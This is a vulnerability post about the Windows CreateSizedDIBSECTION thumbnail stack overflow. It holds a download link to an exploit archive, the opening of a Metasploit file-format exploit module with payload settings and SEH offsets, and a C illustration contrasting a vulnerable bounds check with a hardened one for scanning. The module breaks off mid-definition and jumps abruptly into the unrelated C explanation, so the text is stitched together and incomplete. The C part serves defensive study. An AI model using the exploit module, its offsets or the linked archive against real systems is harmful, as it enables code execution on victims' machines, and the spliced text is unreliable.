A remote stack buffer overflow vulnerability exists in the Microsoft Windows Graphics Rendering Engine. A remote attacker can exploit it by tricking a user into visiting a malicious web page or into opening and processing a malicious Office document; parsing the crafted thumbnail corrupts memory and can lead to arbitrary code execution or a denial of service.
Resource:
Msf was updated a few days ago.
Link: https://www.metasploit.com/redmi... esizeddibsection.rb
Download:
http://down.qiannao.com/space/file/yulegu/-4e0a-4f20-5206-4eab/ms11_xxx_createsizeddibsection.rar/.page
Affected Systems:
Microsoft Windows XP Professional
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows Server 2003
Poc:
##
# $Id: ms11_xxx_createsizeddibsection.rb 11466 15:30:29Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in the handling of thumbnails
        within .MIC files and various Office documents. When processing a thumbnail bitmap
        containing a negative biClrUsed value, a stack-based buffer overflow occurs. This
        leads to arbitrary code execution.

          In order to trigger the vulnerable code, the folder containing the document must be
        viewed using the "Thumbnails" view.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Moti & Xu Hao',                    # original discovery
          'Yaniv Miron aka Lament of ilhack',
          'jduck'                             # Metasploit module
        ],
      'Version'        => '$Revision: 11466 $',
      'References'     =>
        [
          [ 'CVE', '2010-3970' ],
          #[ 'OSVDB', '?????' ],
          #[ 'MSB', 'MS11-XXX' ],
          #[ 'BID', '????' ],
          [ 'URL', 'http://www.powerofcommunity.net/schedule.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'      => 'seh',
          'AutoRunScript' => 'migrate -f'
        },
      'Payload'        =>
        {
          'Space'       => 512,
          'BadChars'    => "\x00",
          'DisableNops' => true   # no need
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # This automatic target will combine all targets into one file :)
          [ 'Automatic', { } ],

          # Windows 2000 is a soft target... You're not still using it are you?
          [ 'Windows 2000 SP0/SP4 English',
            {
              'Offset' => 1548,   # Offset to SEH frame
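The module description above attributes the overflow to a thumbnail bitmap whose BITMAPINFOHEADER carries a negative biClrUsed. The C program below is an added illustration of that bug class; it is not code from this page, from the Metasploit module, or from Windows. It parses the relevant fields out of a constructed 40-byte header, shows a signed bounds check of the kind a negative palette count slips past (the derived copy length then wraps, so a copy into a fixed 256-entry stack palette runs past the frame until it faults, which is the behaviour an SEH-overwrite exploit like this module relies on), and beside it the unsigned, biBitCount-derived check that rejects the same header. The real check and frame layout inside Windows are not reproduced; the function names, the 256-entry palette capacity and the sample biClrUsed of 0xFFFFFFFF are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BIH_SIZE   40u   /* on-disk size of BITMAPINFOHEADER */
#define MAX_COLORS 256u  /* assumed palette capacity: 8 bpp -> 256 RGBQUADs */

/* Only the BITMAPINFOHEADER fields this check needs. */
typedef struct {
    uint32_t biSize;
    uint16_t biBitCount;
    uint32_t biClrUsed;
} bih_t;

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Parse a little-endian BITMAPINFOHEADER (Windows layout: biSize at
 * offset 0, biBitCount at 14, biClrUsed at 32). Returns 1 on success. */
static int parse_bih(const uint8_t *buf, size_t len, bih_t *out) {
    if (buf == NULL || len < BIH_SIZE) return 0;
    out->biSize     = rd32(buf + 0);
    out->biBitCount = rd16(buf + 14);
    out->biClrUsed  = rd32(buf + 32);
    return out->biSize == BIH_SIZE;
}

/* Vulnerable pattern (illustrative, assumed, not the real Windows code):
 * the limit is enforced with a signed comparison. biClrUsed = 0xFFFFFFFF
 * is -1 as an int, so it is not "> 256", and the byte count derived from
 * it wraps to a huge size_t. A copy of that length into a 256-entry stack
 * palette overruns the frame, and the SEH record beyond it, until it faults.
 * Returns the byte count the copy would be handed, or 0 if rejected. */
static size_t palette_bytes_vulnerable(const bih_t *h) {
    int count = (int)h->biClrUsed;           /* DWORD viewed as signed */
    if (count > (int)MAX_COLORS) return 0;   /* catches large positives only */
    return (size_t)count * 4u;               /* negative count -> wraps */
}

/* Hardened check: keep biClrUsed unsigned, derive the legal maximum from
 * biBitCount (1, 4 or 8 bpp -> 2, 16 or 256 entries; 0 means "all"), and
 * refuse anything above it before any copy takes place. */
static size_t palette_bytes_safe(const bih_t *h) {
    if (h->biBitCount == 0 || h->biBitCount > 8) return 0;  /* no palette */
    uint32_t max   = 1u << h->biBitCount;
    uint32_t count = h->biClrUsed ? h->biClrUsed : max;
    if (count > max) return 0;                              /* unsigned compare */
    return (size_t)count * 4u;
}

/* Constructed sample: a 40-byte header for a 1x1, 8-bpp DIB with the given
 * biClrUsed; the remaining fields are zero, which is valid for this check. */
static void make_bih(uint8_t buf[BIH_SIZE], uint32_t clr_used) {
    memset(buf, 0, BIH_SIZE);
    buf[0]  = 40;   /* biSize */
    buf[4]  = 1;    /* biWidth  = 1 */
    buf[8]  = 1;    /* biHeight = 1 */
    buf[12] = 1;    /* biPlanes = 1 */
    buf[14] = 8;    /* biBitCount = 8 */
    for (int i = 0; i < 4; i++)
        buf[32 + i] = (uint8_t)(clr_used >> (8 * i));
}

/* 1 if the header passes the vulnerable check but fails the hardened one
 * (the negative-biClrUsed trigger), 0 if both agree, -1 if not a BIH. */
static int classify(const uint8_t *buf, size_t len) {
    bih_t h;
    if (!parse_bih(buf, len, &h)) return -1;
    size_t v = palette_bytes_vulnerable(&h);
    size_t s = palette_bytes_safe(&h);
    return (v != 0 && s == 0) ? 1 : 0;
}

/* Build a sample header with the given biClrUsed and classify it. */
static int sample_verdict(uint32_t clr_used) {
    uint8_t buf[BIH_SIZE];
    make_bih(buf, clr_used);
    return classify(buf, sizeof buf);
}

int main(void) {
    printf("biClrUsed=16         -> %d (benign)\n",       sample_verdict(16));
    printf("biClrUsed=300        -> %d (both reject)\n",  sample_verdict(300));
    printf("biClrUsed=0xFFFFFFFF -> %d (trigger)\n",      sample_verdict(0xFFFFFFFFu));
    return 0;
}
```

The point of keeping both checks side by side is the verdict function: a file-format scanner that wants to flag this specific trigger can look for exactly the headers on which the two disagree, i.e. a palette count the signed check accepts and the unsigned, bit-depth-bounded check does not.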